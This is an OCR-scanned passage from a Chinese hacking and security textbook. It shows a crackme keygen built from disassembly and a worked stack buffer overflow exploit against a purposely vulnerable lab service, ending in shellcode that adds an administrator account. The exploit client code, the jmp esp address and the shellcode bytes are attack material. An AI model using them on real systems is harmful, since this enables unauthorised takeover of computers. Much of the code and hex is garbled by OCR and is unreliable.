004015E7 
0864015EA 
004015EC 
004015EF 
004015F2 
004015F5 
004015F8 
G64015FA 
99491520 
00401600 
99491603 
00401606 
005016 8A 
00401608C 
004016 8F 
00401612 
00401615 
00401618 
88881618 


> 


EB 99 
8B55 ЕВ 
83С2 01 
8955 ЕВ 
8В45 ЕВ 
3845 ЕҢ 
70 42 
8850 EQ 
51 

8080 ЕС 


E8 120930099 


ВЕВЕОВ 
8B45 ЕВ 
9362 

8945 ЕВ 
8B4D ЕЙ 
С1Е1 88 
8855 ЕЙ 
3301 

8955 ЕВ 
8855 ЕВ 
83С8 01 
8B4D ЕҢ 


OFAF4D ED 


Ғ?р1 
ВЕЙЕСТ 
8855 ЕВ 
BFñFDB 
8955 FÜ 


-EB ñD 


8Вн5 ЕВ 


short Brad 500 .88481508 


ебх ,dword 
edx, 9х1 

dword ptr 
еах :dword 
еах ,dword 


ptr ss:[ebp-0x28] 


55:Геһр-Өх201|,ейбх 
ptr ss:[ebp-0x28] 
ptr ss:[ebp-0x1C] 


short Brad 500 . 8848161 


есх ,dword 
push есх 
lea ecx ,dword 


mousx edx,al 
еах ,dword 
eax,edx 
dword ptr 
ecx, dword 
ecx, 9х8 
edx „диога 
ейх,есх 
ашоға ptr 
еах ,dword 
eax, 9х1 
есх ,dword 


imul ебх ‚еах 
mou dword ptr 


call Brad Sob. 


ptr ss:[ebp-0x28] 


ptr ss:[ebp-8x14] 
88081908 


ptr 55:Геһр-Өх18) 


55:[е0р- 09х10] ,еах 
ptr 55: [ебр- 09х28] 


ptr 55: [ебр-0х10] 


55: |ебр- 09х19] ,edx 
ptr 55 :|ебр- 89х28] 


ptr ss:[ebp-0x1C] 


imul ecx,dword ptr ss:[ebp-0x28] 


ss:[ebp-0x10],edx 


jmp short Brad 500 .884815С7 


[ebp-8x28] 保 存 当 前 计算 到 的 位 数 
[ebp-8x1C] 保 存 name 总 长 


[ebp-8x18] 保 存 当前 计算 的 密码 /7/ 初 始 密 码 为 8x81276345 


接 看 ， 根 据 分 析出 的 地 址 对 应 的 变量 写 出 注册 机 的 计算 代码 (这 里 笔者 选择 使 用 
C/C++ 来 编写 注册 机 ， 因 为 C/C++ 提供 了 _asm 这 一 关键 字 ， 所 以 可 以 方便 地 用 汇编 来 实 
现 ， 简 化 了 编写 注册 机 的 难度 ) 。 


char пате [100]; 


long key; 


int Ten; 


key=2166842181; 


// 用 来 保存 输入 的 name 
// 用 来 保存 计算 中 的 密码 


// 用 来 保存 name 长 度 ( 测试 时 方便 改变 循环 次 数 来 调试 每 一 步 得 到 的 密码 ) 


«БЕП сти>>-патме> 3 len: 


for (int 1=0;1<1еп;1++) 


{ 


char m; 


п=паме [1]; 


( 


asm 


movsx edx,m 
mov eax,key 
add eax,edx 
mov key,eax 
mov ecx,1 


511 ecx 0х8 
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// 为 key 赋 初始 值 0x81276345 对 应 的 十 进 制 


// 用 来 保存 每 位 计算 的 字符 


Е: 


mov edx, key 
xor edx, ecx 
mov key, еах 
mov eax,i 
add eax, 0х1 
mov ecx, lex 
imul ecx,i 
not ecx 

imul eax,ecx 
mov edx, key 
imul edx,eax 


mov key, edx 


} 


std: :cout<<key; 


通过 上 面 的 代码 可 以 看 出 ， 输 出 的 key 还 不 是 最 终 的 密码 ， 可 以 用 循环 最 后 一 次 保存 的 
密码 来 验证 计算 的 结果 正确 与 否 〈 这 里 用 来 测试 的 name 是 12345678) ， 结 果 如 图 8-46 所 示 。 

-1786453832 的 十 六 进 制 双 字 的 值 就 是 9584E0B8， 所 以 到 这 里 的 计算 是 正确 的 。 

那么 为 什么 计算 的 结果 不 是 正确 的 密码 呢 ， 继 续 F8 单 步调 试 程序 ， 如 图 8-47 所 示 。 


jmp short Brad Sob .884815С7 
тоу eax,dword ptr ss:[ebp-8x106] 
push eax ТЕЛ TÆR 
68 54404000 push Brad_Sob . 90494954 ASCII "10и" 
8040 рс Теа ecx,duord ptr 55: [евр-9х24] 
51 push есх 
ЕВ 52070000 call <jmp .eFC42 .#2818> 人 三 这 里 eax ,ecx 改 恋 丁 
83C4 ВС add еср,8хС 
8040 DC Теа ecx,dword ptr ss:[ebp-86x24] 
99491632 ЕВ 79020000 call Вкад 500. 884 9818В88 
00401637 58 push еах 
884081638 8040 E8 Теа ecx,duord ptr ss:[ebp-6x18] 
0010163B ЕВ 89929898 call Вкад Sob . #030180 
00401640 85C 0 test eax,eax 
80481652). ƏF85 ҒЕӨВӨӨӨВ |jnz Brad_Sob.00401747 ET 
00401648 8080 ACFEFFFF | Теа ecx,dword ptr ss:[ebp-Bx 
994916 3Е ЕВ 19070000 call < пр .ЕМЕСц2 .#540> | 关键 跳 转 
884081653 С6ц5 ЕС 93 тоу byte ptr $5 :[ебр-9х4] ‚ 9х3 
00401657 бА 66 push 9х66 


28-46 ”测试 注册 机 ( 失败 ) 图 8-47 ”计算 序列 号 后 代码 

在 执行 完 call<jmp.&MFC42.#2818> 语 句 后 ，ecx 和 eax 值 均 被 改变 了 了 ， 而 且 ecx 存 储 的 
值 经 测试 就 是 name 对 应 的 正确 密码 。 由 此 可 以 确定 call<jmp.&MFC42.#2818> 内 的 代码 计 
算出 了 密码 。 

通过 OD 提 供 的 call 的 函数 名 可 以 看 出 来 ， 这 是 一 个 MFC 封 装 的 函数 ， 因 为 缺少 
MFC42.DLL 的 符号 表 ， 所 以 OD 没有 把 对 应 的 函数 名 告诉 我 们 。 

这 里 可 以 使 用 IDA Pro 目 动 下 载 所 需 的 符号 表 〈 也 可 以 手动 搜索 .pdb 文件 ) 来 找到 对 应 
函数 ， 把 CrackMe 扔 到 IDA Pro 中 ， 跳 转 到 0x00401642 的 位 置 ， 如 图 8-48 所 示 。 

由 此 可 见 这 个 冰 数 是 CString::Format 了 疯 数 ， 压 入 的 参数 分 别 是 call 前 3 个 push 中 的 前 2 个 

(第 3 个 push 的 是 返回 地 址 ，VC 6.0 编 译 出 的 程序 调用 函数 时 先 用 ecx 保 存 地 址 ， 然 后 压 入 
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堆栈 ) 。 


eax, Геһрғоағ 16] 

еах 

offset аи “名 1U” 
ecx, [ебр+чаг 24] 


есх 

?Еокпат САС т пд  )0ААХРВ022 ; CString::Format(char const #,...) 

esp ， 

ecx, [ебр+чаг 24] 

unknoun_libname_7 ; Microsoft UisualC 2-1B/net runtime 
; МЕС 3.1-18.8 32bit 

еах 

ecx, Гебр+чаг 18] 

sub 4981868 

еах, еах 

loc 4812747 


28-48 加载 符号 表 后 的 代码 注释 
其 实 有 使 用 MFC 经 验 的 程序 员 应 该 早已 猜 出 来 call 要 实现 的 功能 ， 因 为 call 前 压 入 了 一 
个 常量 参数 “%lu” 是 16 进 制 数 的 标识 。 
于 是 ， 在 注册 机 代码 下 添加 如 下 代码 : 


С5Ег1па зЪг; 
ЗЪР.Еогта| (7 ("910"). Кеу); 


std:wcout<<LPCTSTR (str); 


测试 结果 如 图 8-49 所 示 。 


0 Correct!!, Way То Со. 


图 8-49 验证 注册 机 | 
可 以 看 到 ， 得 到 了 正确 密码 ， 破 解 成 功 。 


823 多 语言 配合 完成 exploit 


接 下 来 笔者 将 通过 对 一 个 程序 的 逆 加 分析， 讲解 C 语 言 、 汇 编 语 言 、CMD 命 令 等 如 何 
协同 合作 ， 来 完成 从 漏洞 挖掘 到 分 析 ， 再 到 写 入 恶意 代码 ， 最 后 完成 对 一 个 目标 计算 机 的 
exploit 过 程 。 

笔者 有 一 个 朋友 写 了 一 个 有 漏洞 的 程序 ， 模 拟 的 是 一 个 网 络 服务 。 大 家 都 知道 ， 在 运 
行 一 些 网络 服 务 的 时 候 ， 会 在 计算 机 中 开局 一 个 痛 口 ， 用 这 个 正 口 来 监听 同样 在 互联 网 上 
执行 这 个 网 络 服务 的 其 他 计算 机 发 来 的 交互 信息 ， 就 好 像 3389、445 这 些 问 口 一 样 ， 由 于 
这 个 程序 存在 漏洞 ， 正 好 可 以 拿 这 个 程序 ， 在 虚拟 机 中 配置 的 环境 下 运行 一 下 看 看 〈 见 图 


= 


——\ $ 
—— 


\ 


8-50) 。 


程序 成 功 运行 起 来 了 ， 它 其 实 是 一 个 模拟 的 网 络 服务 ， 既 然 是 网 络 服务 ， 可 以 看 看 端 
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cx C:\Documents and Settings\ådministrator\ RMA 


exploit target server 1.0 


图 8-50 Server 程 序 运 行情 况 


口 的 开放 情况 ， 在 CMD 下 用 netstat -an 查 看 结果 如 图 8-51 所 示 。 


C:\Documents and settings Mdministrator netstat 一 an 


Active 


Proto 
TCP 
TCP 
ТСР 


ЖАВРЯЖ 177775811, Ж ЕТЕШ Wr Кт O H SEN e ИХЕ ЗА BJ М 25 JR 2 JT 
局 的 。 接 下 来 看 看 这 个 程序 的 功能 ， 先 正 同 反 汇编 一 下 ， 看 看 程序 是 如 何 运 行 的 。 用 IDA 


Connect ions 


Local ûddress Foreign Address State 
0.0.0.0:135 ТИОИОЯОЫС LISTENING 
й.й.0.й:445 0.0.0.0:0 LISTENING 
й.й.0.й:777?77 0.0.0.0:08 LISTENING 


图 8-51 Server 程 序 运行 后 端口 情况 


Pro 打 开 程 序 ， 直 接 按 F5 查 看 伪 代 码 ( 见 图 8-52) 。 


t cdecl maintint argc, const char жхағпу, const char *жепур) 


SOCKET 93; // еахв! 

SOCKET uN; // ебра! 

void #05; // ғах8? 

void уб; // еах@5 

SOCKET 97: // ebxG6 

void #085 // еах@б 

void жу9: // eax@é 

void #010: // ғах86 

int 911; // 25107 

void жу12: // еах@8 

void «918; // еах@11 

Struct sockaddr папе; // [sp+hh] Гор-3В84п 184 
Struct sockaddr addr; // [sp+14h] Гор-зацп еб 
char 917; // [5p+28h] [bp-399h 1607 

Struct WSAData WSñData; // [5р+228һ] ГЪр-19 00 161 


WSñStartup(0x101u, &VSAData); 
v3 = socket(2, 1, 0); 

ОҢ = 93: 

АҒ ( (signed int)u3 < В) 


ostrean operator (03); 
ostrean operator ("socket creating еггог!“); 
u5 = (void *)ostream operator (18); 
sub 481288(55, (void ( сдесі *)( DUORD))sub 801208); 
exit(1); 
} 
#( WORD *«)&пате .5а_Фата[2] = 2; 
#( WORD #)впапе -sa йаїа[н] = һЕоп5( Өх1Е61и); 
*( DWORD #)впапе .sa data[6] = hton1(8); 


if ( 01п9(ч4, (struct sockaddr »)((сһағ *#)&папе + ц), 16) ) 


{ 


ostrean operator ("binding stream socket errort"); 
уб = (void «)озЕғеғап operator (18); 


88-52 ”Server 程序 反 汇 编 伪 代码 
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从 图 8-52 可 以 看 到 ， 其 实 就 是 用 常规 的 Socket 建 立 套 接 字 进行 交流 ， 用 WSAStartup 初 始 
化 ， 然 后 畸形 了 一 些 bind、listen 等 对 了 PP 端口 的 监听 ， 但 是 这 里 需要 关注 一 些 重 点 的 操作 〈 见 
图 8-53) 。 

图 8-53 这 里 htons 后 面 的 0x1E6l1u， 如 果 将 十 六 进 制 转 换 成 十 进 制 就 是 7777， 其 实 这 里 
就 是 对 端口 的 复制 ， 也 就 相当 于 C 语 言 中 的 sockaddrsin port 操 作 〈 见 图 8-54) 。 


memset(&u17/, 0, 9х208и); 


ж( WORD *)&папе .sa _ dataf4] htonsfd ВХТЕб и) ; 911 = recu(u7, 8917, 512, 0); 
ж( DWORD *)ёпапе.ѕа data[6] ПҒап1(8); if ( u11 < 8) 


8-53 ”Server 程 序 反 汇编 分 析 图 8-54 ”Server 程 序 反 汇 编 分 析 
紧 接 看 可 以 看 到 recv 了 ， 这 是 Socket 方 法 中 最 为 重要 的 一 个 函数 ， 按 照 MSDN 中 的 描 
述 ，v7 是 套 接 字 名 称 ，v17 是 接收 的 数组 ，512 是 数组 大 小 ， 这 个 程序 会 监听 传 到 这 个 端口 
上 的 数组 ， 接 下 来 要 关注 一 下 这 个 数组 了 〈 见 图 8-55) 。 
sub 401000 这 个 函数 调用 了 v17 这 个 数组 ， 直 接 跟 进 这 个 函数 里 看 看 代码 〈 见 图 8-36) 。 


void жу2; // еах@1 
void жу3; // еах@1 
void жуд; // еах@1 
char у5; // [sp+8h] |рр-с8п 1091 


} 
ѕир 5301000017); Гору 49 


88-55 ”Server 程 序 反 汇编 分 析 图 8-56 ”Server 程 序 漏洞 定位 
第 一 个 看 到 的 就 是 strcpy 函 数 ， 可 以 初步 认为 漏洞 发 生 在 这 里 ， 漏 洞 挖掘 最 为 重要 的 
是 对 strcpy 敏 感 ， 因 为 大 多 数 的 栈 洲 出 都 会 发 生 在 这 个 函数 中 。 假 设 笔者 复制 目标 的 bu 在 
大 小 为 8Byte， 而 笔者 对 于 al 的 大 小 并 没有 进行 严格 检查 ， 就 会 造成 栈 派出 ， 这 里 不 多 介 
绍 ， 经 过 这 一 段 的 分 析 ， 可 以 初步 考虑 POC 程 序 怎么 写 ， 也 就 是 说 ， 要 建立 一 个 与 这 个 
IP、 端 口 的 通信 ， 然 后 发 送 一 个 畸形 字符 串 到 这 个 JP 和 这 个 端口 上 ， 如 果 程 序 骨 演说 明 漏 
洞 真 的 存在 。 是 笔者 写 的 程序 的 关键 算法 如 图 8-37 所 示 。 


> 
if(WSAStartup(MAKEWORD(2,2),&wsaData)) 
4 


НЕЕ ‘Socket Inite"); 
retur 


Target_IP = argu[1]; 

Target_Port = argu[2]; 

target_socket.sin_family = AF_INET; 

target_socket.sin_addr.S_un.S_addr = inet_addr(Target_ IP); 

target_socket.sin_port = htons(atoi(Target_ аа 

5 = Socket(AF ІНЕТ,50СК ЗТВЕЙМ, Ө); Е: ЖУ 

if(connect(s,(struct sockaddr*)&target socket tt get_socket))《9)7Z 建 立 与 目标 IP 和 端口 的 连接 
4 


рғіпЕЕС ЗЕ е"); 
closesocket(s); 
WSñCleanup(); 

return 84 


H 

printf(" 连 接 成 功 t\n"); 

memset(Exploit _ buffer,"h'" ,sizeof(Exploit_buffer))3ZZ 给 exploit_buffer 讨 值 为 9 
send(s,Exploit buffer,sizeof(Exploit buffer) ,NULL) ; 

printf("send окҳп"') ; 

сТосезоскег(5); 

WSñCleanup(); 

return 9; 


8-57 构造 Client 程 序 


— юз -- 


AAU 黑客 与 安全 技术 指南 


- 
me 


其 实 很 简单 ， 通 过 建立 套 接 字 与 目标 IP 端 口 实现 连接 ， 然 后 通过 memset 对 一 个 
1024byte 大 小 的 Exploit _ buffer 赋值 ， 这 个 Exploit buffer 就 是 要 发 送 的 字符 串 ， 最 后 通过 
send 函 数 将 字符 串 发 过 去 ， 在 编译 之 后 输入 命令 发 送 这 个 字符 串 。 这 里 要 说 明 一 下 ， 在 虚 
拟 机 中 可 以 用 另外 一 个 虚拟 机 对 这 个 虚拟 机 进行 连接 ， 只 要 能 ping 通 就 可 以 ， 这 里 为 了 省 
事 ， 束 直接 向 127.0.0.1 本 地 发 送 ， 如 图 8-58 所 示 。 


C:\Documents and Settings “Яйдтпіпізсекабок> "С: -Рғоағап Files Microsoft Visual Studi 
oMyProjects\exploitme\Debug\exploitme.exe” 127.0.0.1 7777 


连接 成 功 ， 


图 8-58 Client 程序 连接 测试 
从 图 8-$8 可 以 看 到 这 个 字符 串 连 接 成 功 ， 那 么 看 看 在 接收 端 发 生 了 什么 〈 见 图 
8-59) ， 记 得 要 挂 载 WinDbg ( 见 图 8-60) 。 


exploit target server 1.0 


received: 
"т: 
паййййййяйййййййййййййййййййййййййЯйййййййЯййййййййййййЯййЯйййййЯйййййййййййййййййййй 


ANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
ыды. 
NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
аваявявававаййвйяйвайЙййййййййййййЯйЯй СОСЕ Inoock 2.0 


8-59 Server 程 序 接收 畸形 字符 串 


чолі. JJ SUUUUU LSUDUUU ,. Масово а К А „11 Z хеви ра И ШИШ И ИНЕ 

(53с.30с): Ассезз violation - code с0000005 (!!! second chance !!!) 
2ax=00409a68 еБ==00000080 есх=00410е20 edx=00000000 е=1=00000200 едйі-0012Ғағ4 
зір-41414141 е=р=0012#ЬЬс еБр=00000064 1ор1=0 пу пр еі рі nz па ре пс 
25=001Ь ===0023 ds=0023 е==0023 fs=003b gs=0000 ef 1=00000206 
41414141 ?? ЕГЕ 


88-60 ”WinDbg 跟 踪 漏 洞 触发 位 置 

接收 端 收 到 了 一 大 串 A， 即 我 们 构造 的 Exploit_buffer 中 的 内 容 ， 同 时 WinDbg 又 跳 了 
出 来 ， 程 序 崩 演 了 。EIP 指 向 41414141， 这 是 一 片 无 效 的 内 存 地 址 ， 而 41 正 是 A 的 ASCII 码 
(十 六 进 制 ) ， 漏 洞 果 然 存 在 ， 我 们 调用 kb 可 以 看 看 被 破坏 的 栈 中 的 内 容 〈 见 图 8-61) 。 

至 此 可 以 确定 ， 超 长 串 的 字符 确实 可 以 造成 漏洞 的 触发 ， 问 题 消 数 束 是 sub 401000. 
接 下 来 要 确定 洲 出 点 在 什么 位 置 ， 只 有 找到 了 确定 的 地 址 ， 才 可 以 正确 地 构造 返回 地 址 
及 窗 瘟 shellcode， 这 里 省 去 了 在 栈 中 调试 的 过 程 ， 其 实 就 是 用 memory 查 看 内 存 窗 新 
的 情况 ， 根 据 当 前 esp 的 地 址 0012fbb8 以 及 字符 串 起 始 的 位 置 来 计算 长 度 究竟 是 多 少 ， 
最 后 可 以 知道 漏洞 的 位 置 在 字符 串 的 第 201 个 字 ， 也 就 是 最 开始 的 v17[201] 开 始 出 了 问 
题 ， 于 是 将 POC 的 目标 位 置 改 成 其 他 字符 ， 来 确定 漏洞 是 否 在 那个 地 方 被 触发 〈 如 图 
8-62 所 示 ) 。 
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0:000> КЪ 


ChildEBP 
WARNING: 
ООТ2ЕБЬВ 
0012#ЬЬс 
0012#Ьс0 
0012#Ьс4 
0012#Ьс9 
0012ЕБсс 
ПОТ2ЕЪЯО 
0012ҒҺа4 
0012ҒҺа8 
0012ҒҺас 
О012ЕБей 
0012ҒҺе4 
0012Е Бед 
0012: Бес 
ОПОТ2ЕБЕО 
ПОТ12ЕЪЕ4 
ПОТ2ЕБЕЗ 
0012ҒҺЕс 
0012#с00 
0012#с04 


Ее Адаг 
Frame ТР 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


Args іс Child 
not іп any known module. Following frames пау Бе wrong. 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 


жен WinDbg 查 看 漏洞 触发 时 内 存 空间 情况 


Ғоғ(і-0;і<200;і»») 


Н 


Exploit_buffer[i]='A'; 


? 

Exploit Би Ее“ | 2991-дхсс; 
Exploit Бо Ее | 29811-дхсс; 
#0" (1=202;1<512е0#(Ехр1011 Би ЕЕен) ; 1 ++) 


Exploit buffer[i]="A"; 


去 ， WinDbg ХВЕ ТІҢ Ж» 35 


EEN 610): 


18-62 МРОСФ ехрой 
这 里 将 Exploit buffer 的 第 200 和 201 位 置 的 元 素 改 成 cccc， 这 里 用 0xcc 是 因为 不 知道 
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怎么 输入 cc 对 应 ASCII 码 的 内 容 ， 用 0xcc 表 示 效 果 相 同 ， 此 时 笔者 再 次 将 这 个 程序 发 送 过 
这 次 显示 的 结果 如 图 8-63 所 示 。 


р. 
ка Цер РЕЙ - ЕВА 0000055 и Масова на ІІІ) 


еах-00409а68 еһк-00000080 есх=00410е20 едх-00000000 е=1=00000200 ейі-0012Ғағ4 
еір-4141сссс езр-0012ЕЪБс еБр=00000064 iopl=0 


с==001Ьь ===0023 


4141сссс ?? 


0: 000> dd esp 


为 什 


者 输入 01020304 时 ， 
实 真实 情况 如 图 8-64 所 示 。 


继续 查看 栈 内 的 内 容 《〈 见 


ds=0023 


е==0023 


ЖҰТ 


EBP -> 数据 197-200- 
返回 地 址 -> 数据 201-2046 


пу пр ei 


fs=003b 9550000 


图 8-63 ”RET 地 址 的 定位 
么 是 4141cccc 呢 ?这 与 栈 的 操作 有 关 ， 其 实 就 是 低地 址 向 高 地 址 排列 ， 就 好 像 笔 
到 栈 内 就 成 了 04030201。 人 至 此 ， 可 以 确定 栈 洲 出 发 生 时 的 问题 了 ， 其 


8-64 ” 栈 洲 出 时 的 情况 


图 8-65) 。 


ChildEBP RetAddr Агаз to Child 
WARNING: Frame ІР по іп апу known module. Following frames мау be wrong. 
0012#ЬЬ8 41414141 41414141 41414141 41414141 0х4141сссс 
0012ЕЪБс 41414141 41414141 41414141 41414141 0х41414141 


88-65 


167 


栈 内 内 容 


рі п2 па ре пс 
еҒ1-00000206 


О А 


至 此 可 以 完全 地 确定 这 次 exploit 应 该 如 何 完 成 了 。 这 里 将 这 个 返回 地 址 修改 成 jmp esp 
地 址 ， 然 后 将 esp 也 就 是 0012fbbc 后 的 内 容 改 成 我 们 的 shellcode ( 见 图 8-66) ， 就 能 完成 这 
Жехрои Г СА 8-67) 。 


char shellcode[]="\x31\xd2\xb2\x36\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 

"Мхй8\х8һб\х?2\х20\х8һ\х12\х8йЙ\х?е\хйс\хЗЗ\х?5\хЕ2\х89\хсС?\х@З" 
"%Мх78\хЗС\х8һ\х5/\х?8\хЙ1\хсС2\х8һ\х7/а\х2й\хй1\хс7\х3З1\хей\х8һ" 
"МхЗН\харР\хй1\хсб\хН5Ь\х81\хЗе\х5 7 \хб9\хбе\х!н5\х?5\хЕ2\х8һ\х7а" 
"Мх2Ң\хЙй1\хсС/ \хбб\х8һ\х2сС\хбЕ\х8һ\х7а\х1с\хй1\хс7\х8һ\х?с\хаЕ" 
НАХЕСАХВТА кс? Ухбвухнрух а Зухбефух 91\ хб8\х2 хи? х7 2 АҚ Х6ҒАХ6ВАХ2Ғ" 
НАхЦЛАхицахицахбваухбЕух? 2 ах? ЗАх2 ВУхбвВах? НУК? 2х6 Ах? нухбвукхво"" 
"А хбеухбоух ЗАхб8Ах2 Ах АХ НАХ О ЗЕ 2АХӨ6ҒАХ? АХ? йЙ\хб8\хб6б3'" 
НА хб ТА хбсухб? а хоВух?цухо? хх Ех х26\х2 ПА хбе\ хбълхбвухиц" 
"Ахциух2 9\х26\хб8\хбе\х2 АҚ хХ2ҒА ХЕ 1 ухб ах? 2АХ6ЕАХНЬ\ х3З3\хб8\хЗЗ"" 
"Yx6exx20ÜNXN2NK68NXH2XKRZ2NX6FNXNHDNX68NX73NX65NX72NX2BNXX68NxXx65'' 
"ХНА 2 ВАХА ВАХ ЕАХ6ЗАх2 9\ хбе\хб8\ хб5 АХ? 8х6 5х2 9\ х68\хбЗ"' 
""\хбд\хбн\х2е\х89\ хеб\ хре\х нахо хх дА OSS FfF iad"; 


8-66 ”shellcode 的 构造 


ИГО „ЛА 5һе11соде 
memset(Exploit_buffer „8 „512е0Е(Ехр1о1 г БиЕЕек)) ; //22ехр10оії виЕЕе ІҢ 278 
for(i=0;i<200;i++) 
4 

Exploit buffer[I]= "8"; 
Exploit_buffer[200]=0x12; 
Exploit_buffer[201]=0x45; 
Exploit_buffer[202]=0xfa; 
Exploit_buffer[203]=0x7f; 
for(i=204;i<sizeof(shellcode};i++)}) 
Exploit_buffer[i]=shellcode[i-204]; 
for(i=204+sizeof(shellcode);i<sizeof(Exploit_buffer);i++) 
Exploit buffer[i]="A"; 


图 8-67 ”exploit 完 成 
上 面 的 shellcode 部 分 是 笔者 在 exploit-db 上 找 的 ， 其 功能 是 在 目标 计算 机 上 建立 一 个 
名 为 broK3n 的 用 户 ， 该 用 户 具 有 Administrator 权 限 。 当 然 ， 这 个 shellcode 也 可 以 换 成 其 他 
的 ， 正 如 笔者 刚才 所 讲 ， 将 对 应 的 返回 地 址 修改 成 1245fa7f， 到 了 栈 里 就 成 了 7ffa4512， 
这 是 一 个 通用 的 jmp esp 跳 转 地 址 ， 到 Windows 7 下 仍然 可 以 人 使用， 屡试不爽 。 接 下 来 宪 盖 
shellcode， 由 于 shellcode 大 小 是 194 字 ， 前 面 是 204 字 ， 总 大 小 是 $12 字 ， 不 会 超过 字符 串 的 
布置 大 小 。 在 发 送 过 去 之 后 ， 接 收 疹 显 示 的 是 图 8-68 所 示 的 内 容 。 


c C:\Documents and Settings\ådministrator\ 51 Ш \А\А\ехр101% ве А. exe 口 


Эсэсэсэезезеэсезезезе Эе-эсэеэеэезезезезезеее 


exploit target server 1.0 


I Е Е ыы мағы ыы ма ы ы ы а ы ы = 
“есетуейд: 


APAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
шн... 
ЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯНЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯ tE? 


88-68 Ѕегуег Мехріой 
打开 计算 机 的 用 户 列表 ， 如 图 8-69 所 示 。 


AN тъ за 
Ади анг... 管理 计生 
L éi rokan ВкоКЗп 
Р? -...-. НЕ +-> 


88-69 漏洞 发 生 后 远程 添加 Administrator 用 户 
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第 8 章 ， 逆向 技术 与 软件 安全 = ШИ 


BroK3n 已 经 出 现在 计算 机 的 用 户 列表 中 了 。 当 然 ， 这 些 shellcode 还 能 完成 反弹 shell、 
下 载 执行 指定 程序 等 内 容 ， 这 些 shellcode 的 编写 方法 ， 可 以 在 论坛 中 与 大 家 一 起 交流 。 

到 这 里 ， 对 一 台 计 算 机 的 exploit 完 成 了 。 这 只 是 一 个 简单 的 程序 ， 如 果 有 人 对 这 个 过 
程 感 兴趣 ， 笔 者 可 以 将 这 个 程序 提供 给 大 家 。 在 此 想 说 的 是 这 个 程序 非常 简单 ， 假 如 计算 
机 中 在 运行 某 些 运营 商 的 某 些 网 络 服务 ， 而 那个 网 络 服务 存在 一 个 远程 执行 代码 的 漏洞 ， 
那么 黑客 就 可 以 通过 上 面 的 这 些 操作 完成 对 计算 机 的 控制 ， 其 后 果 是 很 严重 的 。 笔 者 只 是 
将 黑客 所 有 复杂 的 操作 人 简化 下 来 ， 精 人 简 之 后 就 是 上 面 所 讲 的 内 容 。 虽 然 如 今 的 计算 机 存在 
DEP、UAC 等 防护 ， 即 使 如 此 ， 有 些 黑客 大 牛 们 仍然 能 利用 各 种 高 深 的 技巧 绕 过 防护 。 
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读者 从 整个 分 析 中 可 以 知道 ， 计 算 机 的 攻击 与 防护 需要 熟练 使 用 各 种 工具 软件 ， 通 过 
使 用 汇编 和 CMD 命 令 可 以 了 解 漏 洞 是 如 何 产 生 的 ， 不 但 使 用 C 语 言 可 以 完成 对 exploit 的 编 
写 工作 ， 而 且 使 用 Python 和 Ruby 也 能 完成 相同 的 功能 。 攻 击 与 防护 工作 绝 不 是 使 用 单一 语 
言 、 单 个 工具 软件 就 能 完成 的 工作 ， 必 须要 经 过 长 期 的 学 习 与 研究 。 

读者 在 学 习 的 过 程 中 会 发 现 ， 与 内 存 打交道 其 实 并 不 是 一 件 枯燥 的 事情 ， 想 象 一 下 在 
广 朗 的 内 存 空间 中 驰 戏 ， 在 目 由 控制 指针 、 控 制程 序 的 时 候 ， 是 不 是 有 种 一 切 尽 在 掌控 的 
感觉 ， 个 中 乐趣 只 有 随 看 逐渐 地 深入 研究 之 后 才能 体会 。 

黑客 攻防 这 条 路 并 没有 想象 中 那么 难 走 ， 关 键 在 于 乐趣 。 如 果 恋 者 真心 想 学 习 逆 同 分 
析 、 漏 洞 挖掘 与 漏洞 分 析 ， 并 能 写 出 exploit 程 序 ， 从 而 完成 一 次 缓冲 区 溢出 攻击 。 第 一 ， 
要 能 耐 得 住 我 宽 。 当 读者 花 数 小 时 沉浸 在 内 存 空间 的 时 候 ， 就 是 一 个 编程 “修行 ”的 过 
程 ， 同 时 也 会 发 现 沉 浸 其 中 是 多 么 地 其 乐 无 穷 。 第 二 ， 就 是 要 多 学 习 、 多 交流 。 黑 客 绝 
对 不 是 只 会 拿 着 工具 的 “脚本 小 子 ”， 无 论 是 web、 应 用 、 移 动 或 者 其 他 ， 都 需要 静心 学 
习 。 心 浮 气 躁 只 能 浪费 目 己 的 时 间 ， 很 多 前 幸 们 都 经 历 过 弯路 ， 多 跟 技术 大 牛 交 流 可 以 事 
半 功 倍 ， 少 走 弯 路 。 第 三 ， 是 要 保持 兴趣 。 兴 趣 永远 是 最 好 的 老师 ， 保 持 对 事物 的 兴趣 可 
以 让 目 己 坚持 ， 坚 持 ， 再 坚持 。 
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АА 黑客 与 安全 技术 指南 


关于 病毒 的 研究 和 基于 病毒 的 攻防 技术 ， 在 计算 机 领域 非常 重要 。 本 章 是 一 个 “大 ” 
